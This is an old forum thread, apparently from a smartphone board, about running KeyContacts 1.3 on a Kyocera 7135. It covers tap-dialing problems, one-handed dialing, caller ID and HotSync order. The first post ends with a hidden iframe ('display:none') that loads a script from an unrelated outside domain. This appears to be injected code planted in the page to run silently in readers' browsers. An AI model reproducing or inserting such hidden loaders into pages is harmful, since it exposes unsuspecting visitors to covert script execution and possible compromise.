+ Reply to Thread

KeyContacts 1.3 on a 7135... opinions?

Well, I took a look around the board and saw a few posts, mostly regarding the 6035; especially this thread:

http://www.smartphonesource.com/vbul...ht=keycontacts

But I was wondering how people like the newer version 1.3 on the 7135? Any new features in this release relative to the 7135? The update seems to have been designed to accommodate the new Tungsten T from Palm. But you never know.

Earlier on (ver. 1.1 I think) people were commenting that it messes up voice-dialing and speed dialing on the 6035. Any such issues on the 7135?

Thanks in advance. Criticisms of the program are just as good as "it works great", so let's hear'em! <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just registered Key Contacts a few days ago and love it. Maybe I could've tweaked the standard Pocket Mirror settings better (or maybe not), but Key Contacts does things for me that i've wanted for a long time... like multiple categories for each contact (if it could be done before I don't know how). And it has lots of other enhancements you can read about at Chapura's site. I don't have the 7135, but I have a Treo... they make great use of the jog-dial... but I'm sure the up/down/ok with the 7135 functions similarly. But when I was reading about the features I never saw the 7135 mentioned... but I'm sure it works great.
    Please visit my picture site: Robert-O-Rama :)

Thanks Robert. Yeah, I used it once before as well, on my Handera 330. It was great. It was so nice to finally be able to properly sync all my contact info from Outlook.

Normally, it wouldn't be such a big deal. The subset of fields that Palm has is usually sufficient. But I was sync'ing with two computers, so if I put a lot of details for one contact on the first computer, I would lose a lot of the data once the PDA was sync'ed to the second computer because the Palm conduit ignored much of the original contact information. Once I got KeyContacts, that was no longer a problem since it carried EVERYTHING over.

Then I tried an update when they improved jog-dial functionality in version 1.2 (all this within their 30-day trial) and it was even better. In fact, the only thing they didn't accomplish (for me) was to allow for KeyContacts to take advantage of the Handera 330's virtual graffiti area. In fact, the Handera Hi-Res was fine too (scale-to-fit mode).

I didn't even bother with the AddressBook after that. KeyContacts was simply great. But SmartPhones are different. They link into the Addressbook for phone numbers, so the fact that Keycontacts doesn't use the default Palm DB could cause some concern. I know they created an enhancement for wireless devices, (I think it was in version 1.2.) , but I don't know about the 7135. Perhaps they included something in version 1.3.

They say that it has "Easy interaction with wireless enabled devices. Immediately dial phone numbers in KeyContacts, just by tapping on them". But each of these SmartPhones is a little different, so you never know. The Treo 300 probably works great because it was likely one of the units they tested it with, but with these newer units, like the 7135, it might not.

Anyway, thanks for the feedback Robert. Anyone else?

The fact that it syncs ALL Outlook fields was very important to me, and it does it better than I even expected. And the support for multiple categories on the Treo has changed the way I store contacts from now on. I used to have to leave my contacts list defaulting to "ALL" because I never knew when I would need to dial a number from a category other than my most frequently used one (my company contacts)... but now I have created a "hotlist" category and put everybody that I actually talk to in that category (along with their original category) and instead of having to search through 500+ contacts I only have to deal with 78 (for now).

Version 1.3 is my first time using Key Contacts, but I have no problem dialing numbers directly from there.... and using nothing but the jogdial and dial pad (one handed operation baby!)... no stylus is needed to dial from Key Contacts 1.3. I imagine that the 7135 would function the same.

But it almost isn't that big of a deal now because this weekend I imported my entire Outlook contacts list into Sprint's Voice Command (store up to 500 contacts on THEIR server for $5 a month).... so, for all of the people currently in my contacts list I only have to push in the jog-dial ONE time and I'm done doing anything but talking from there

Key Contacts is awesome though!

Originally posted by SteveNYC
    Thanks Robert. Yeah, I used it once before as well, on my Handera 330. It was great. It was so nice to finally be able to properly sync all my contact info from Outlook.

Normally, it wouldn't be such a big deal. The subset of fields that Palm has is usually sufficient. But I was sync'ing with two computers, so if I put a lot of details for one contact on the first computer, I would lose a lot of the data once the PDA was sync'ed to the second computer because the Palm conduit ignored much of the original contact information. Once I got KeyContacts, that was no longer a problem since it carried EVERYTHING over.

Then I tried an update when they improved jog-dial functionality in version 1.2 (all this within their 30-day trial) and it was even better. In fact, the only thing they didn't accomplish (for me) was to allow for KeyContacts to take advantage of the Handera 330's virtual graffiti area. In fact, the Handera Hi-Res was fine too (scale-to-fit mode).

I didn't even bother with the AddressBook after that. KeyContacts was simply great. But SmartPhones are different. They link into the Addressbook for phone numbers, so the fact that Keycontacts doesn't use the default Palm DB could cause some concern. I know they created an enhancement for wireless devices, (I think it was in version 1.2.) , but I don't know about the 7135. Perhaps they included something in version 1.3.

They say that it has "Easy interaction with wireless enabled devices. Immediately dial phone numbers in KeyContacts, just by tapping on them". But each of these SmartPhones is a little different, so you never know. The Treo 300 probably works great because it was likely one of the units they tested it with, but with these newer units, like the 7135, it might not.

Anyway, thanks for the feedback Robert. Anyone else?

A Follow-up from Chapura

Well, not that this is a whole lot of info, but I e-mail Chapura about whether or not they had tested KeyContacts on a 7135. Here was their answer:

"KeyContacts has been tested with a Kyocera 7135.

I am not sure if KeyContacts will or will not work with all the features that are available on Kyocera 7135.

Each handheld unit is unique with regards to the built in features and KeyContacts may not work with all of the features.

If there is something in particular that you would like to see added to KeyContacts for a better Outlook sychronization with the SmartPhone capabilities, Please send in a request and I will pass it alone to the Management staff."

There you have it. Admittedly, it's not a lot. But I am pleased to see they are actually have a phone to test with. Sometimes that's half the battle. Hopefully that means they are actively testing it and that we can see some customizations that take specific advantage of the 7135.

P.S. I almost forgot.... for those of you lucky enough to have a 7135 and smart enough :p to use KeyContacts....give Chapura some ideas and feedback. It'll make my life better when I finally get mine!!!!

I tried KeyContacts on the 6035, and dropped it. It is simply not worth it to me to lose the jog dial without open the flip. The 7135 (which I will be waiting for even longer than you Verizon fans - I live in Canada) is different, since you have to open the flip anyway in order to make a call.
    Does anyone actually use KeyContacts with the 7135? How does that work? I assume you open the flip, start Key Contacts, but what is next? What can you do with the navigator? What can you do with the numeric keys? Can you switch folders and/or categories without the stylus?
    Cheers
    Rares

pjp
    I have a 7135 and Key Contacts 1.3. One-handed operation would be nice, but if you can do it with this software/hardware combo, I can't figure out how. You can't do it with the native Palm "Address" application either, can you?

As far as "tap-dialing" with the 7135/KeyContacts, it works, but not as nicely as tap-dialing in the native Palm "Address" application. In KeyContacts, you tap the number from the list view, and it brings up another screen -- not the normal screen for viewing all the data on a given contact -- the "Dial Number" screen. It lists the name of the contact, and then lists the numbers available for that record in a box. You highlight one of those and then tap the dial button on the screen and away you go...

This is different than, and in my opinion, inferior to, the tap-dialing setup in the regular Address app. There, the list displays phone numbers, you tap the number, and the phone dials; no intermediate screen. If there are multiple numbers for a contact, you have a little drop down that will let you choose which number to dial. I like that a lot better.

Overall though, this is not a deal-breaker for me with KeyContacts. I paid for the product before the trial was even up because I really value being able to sync all of the Outlook fields (indeed, I would love it if Chapura or someone else could make syncing the Calendar, Notes and ToDo fields with Outlook similarly perfect -- if they can do it with Contacts, they certainly should be able to with the others). That benefit far outweighs the slightly clunky tap-dialing system in KC. Hopefully Chapura can improve on that function.

Resurecting old news here, but this was the killer for me. TAKEphone doesn't access teh Key Contacts DB, and having to tap the screen to dial a number isn't as intuitive as the default address book.

Sure the display was much nicer, but no one handed dialing out weighed the additional features of Key contacts.

Thank god I hadn't payed for it yet.

KeyContacts 1.3 on a 7135... opinions?

Originally posted by pjp
    I have a 7135 and Key Contacts 1.3. One-handed operation would be nice, but if you can do it with this software/hardware combo, I can't figure out how. You can't do it with the native Palm "Address" application either, can you?
    Sure you can! Here are the steps

1. Open Flip (One handed "Kirk" flip takes practice but is possible with adroit use of thumb.)

2. Push Address Book button.

3. Scroll down to the Contact you wish to dial using "Jog" Button. If the name is not already on the screen, push the appropriate keypad letter to jump to that portion of the alphabet and keep scrolling with your JOG until the name you want is highlighted.

4. If the name has more than one phone number associated with it and the number isn't already shown, then Push OK on the JOG and use JOG scroll down to highlight the correct number. Otherwise skip this step.

5. Push green DIAL button.

You've just dialed a number one-handedly from your native Address book with no use of the stylus!

The only reason I might switch to another address book, would be if I could find one that would print Avery mailing labels directly from my Palm (7135) without having to export them into another program like Outlook or Word. Anybody know of a program like that?

Originally posted by HoTSynC
    Resurecting old news here, but this was the killer for me. TAKEphone doesn't access teh Key Contacts DB, and having to tap the screen to dial a number isn't as intuitive as the default address book.

Sure the display was much nicer, but no one handed dialing out weighed the additional features of Key contacts.

Thank god I hadn't payed for it yet.
    Same situation here. It worked great on the Treo... and the display was great. I had already paid for it, but Chapura refunded my $$$ a couple weeks ago when I called them and they didn't have any definite plans to support the 7135 for one-handed dialing (they have a 30 day money back guarantee, and I was on day 30!). They were very nice about it and I plan to check back with their site every once in a while to see if they have support for the 7135.

In the meantime, I did register TAKEphONE, and it is great for dialing numbers one handed. Now, if only it was a "pretty" as Key Contacts for displaying contact info.

I can't get the tap-dialing to work with the 7135. I saw in the KeyContacts manual that there should be an option in the preferences screen to turn it on, but I don't see the option. I have the trial version. Is this only in the full version?

Also, will the 7135 read the names from KeyContacts for the caller ID, or does it only work with the native address database?

Thanks,
    Mike

mikelawr,

I couldn't get the tap dialing to work either. I e-mailed Chapura tech support, and they said it is a known issue that they are working on, but they wouldn't give a time frame for having it fixed. They also said they didn't know about the caller ID feature but would consider incorporating that in the future.

pjp, are you saying tap-dialing is working with Keycontacts on your 7135?

As a workaround I have synced my Outlook contacts with the standard address book once, so I can use it for dialing/caller ID. I guess until the tap-dialing works, I'll do this every once in a while to add new contacts to the standard address book and keep keycontacts as the normail conduit.

Originally posted by buddyroe
    mikelawr,

I couldn't get the tap dialing to work either. I e-mailed Chapura tech support, and they said it is a known issue that they are working on, but they wouldn't give a time frame for having it fixed. They also said they didn't know about the caller ID feature but would consider incorporating that in the future.

pjp, are you saying tap-dialing is working with Keycontacts on your 7135?

As a workaround I have synced my Outlook contacts with the standard address book once, so I can use it for dialing/caller ID. I guess until the tap-dialing works, I'll do this every once in a while to add new contacts to the standard address book and keep keycontacts as the normail conduit.
    I heard the same thing from them. Hopefully they'll have it working soon. I also sync with the address book so that the caller id works. But, just so you know, you can sync the standard address book every time without a problem. If you have KeyContacts sync first, then any updates that you made to KeyContacts would go to Outlook. If it then syncs with the standard address book, then those changes would then be transferred from Outlook to the standard address book. This way, your caller id will always be up to date... Just make sure that KeyContacts syncs before the Std. address book...

mikelawr,

Wow, that's good news. I never would have tried it. I've never paid attention to the order in which things sync. How do I ensure that KeyContacts syncs first?

Originally posted by buddyroe
    mikelawr,

Wow, that's good news. I never would have tried it. I've never paid attention to the order in which things sync. How do I ensure that KeyContacts syncs first?
    I'm not home now, so I can't tell you exactly, but the order that the apps show up in the hotsync configuration is the order that they will sync. I just put KeyContacts first so that it is guaranteed to go before everything else. If it isn't first, then you have to modify it in the windows registry. If you find the registry key for KeyContacts, you'll see a bunch of entries whose name is just a number. You have to modify those to change the order that the apps are synced.

-Mike

one-handed dialing with standard Address Book?

Originally posted by jazmaan
    Sure you can! Here are the steps

1. Open Flip (One handed "Kirk" flip takes practice but is possible with adroit use of thumb.)

2. Push Address Book button.

3. Scroll down to the Contact you wish to dial using "Jog" Button. If the name is not already on the screen, push the appropriate keypad letter to jump to that portion of the alphabet and keep scrolling with your JOG until the name you want is highlighted.

4. If the name has more than one phone number associated with it and the number isn't already shown, then Push OK on the JOG and use JOG scroll down to highlight the correct number. Otherwise skip this step.

5. Push green DIAL button.

You've just dialed a number one-handedly from your native Address book with no use of the stylus!
    jazmaan,

Thanks for the tip! It works great if I want the primary number.

But, I can't get this to work one-handed (no tapping) with the standard Palm address app if the target name has more than one phone number (and I don't want to dial the first one).

If I hit the green Dial button while on the name (main Address book listing screen), it will correctly dial the first / primary number listed.

However, if I use the OK on the Jog button, I get a new screen listing all the numbers. If I hit the green Dial button now (highlighting any of the numbers), it only switches me over to the Phone Side... no dialing

Is there a preference I need to set somewhere, or an add-on I have to have?

Thanks,

Chreotho

Re: one-handed dialing with standard Address Book?

Originally posted by Chreotho
    jazmaan,

Thanks for the tip! It works great if I want the primary number.

But, I can't get this to work one-handed (no tapping) with the standard Palm address app if the target name has more than one phone number (and I don't want to dial the first one).

If I hit the green Dial button while on the name (main Address book listing screen), it will correctly dial the first / primary number listed.

However, if I use the OK on the Jog button, I get a new screen listing all the numbers. If I hit the green Dial button now (highlighting any of the numbers), it only switches me over to the Phone Side... no dialing

Thanks,

Chreotho
    Chreotho,

Look at this thread... http://www.smartphonesource.com/vbul...&threadid=6922

-Mike

Re: one-handed dialing with standard Address Book?

Originally posted by Chreotho
    Give TAKEphONE a try (version 5.04xe). I was a big fan of Key Contacts 1.3 with my Treo (jog-dial support made it work), but for the 7135 TAKEphONE is a great dialer app.

p.s. I never found the sync order of Key Contacts and the default address book to be an issue. They are both entirely separate databases on the Palm side.

Re: Re: one-handed dialing with standard Address Book?

Originally posted by Robert K.
    Give TAKEphONE a try (version 5.04xe). I was a big fan of Key Contacts 1.3 with my Treo (jog-dial support made it work), but for the 7135 TAKEphONE is a great dialer app.

p.s. I never found the sync order of Key Contacts and the default address book to be an issue. They are both entirely separate databases on the Palm side.
    The reason that I found that the sync order matters is that if KeyContacts is synced first, then any changes made in KeyContacts will then be transferred through Outlook to the default address book. If the default address book is synced first, then the KeyContact changes won't be applied to the default address book until the next hotsync...

-Mike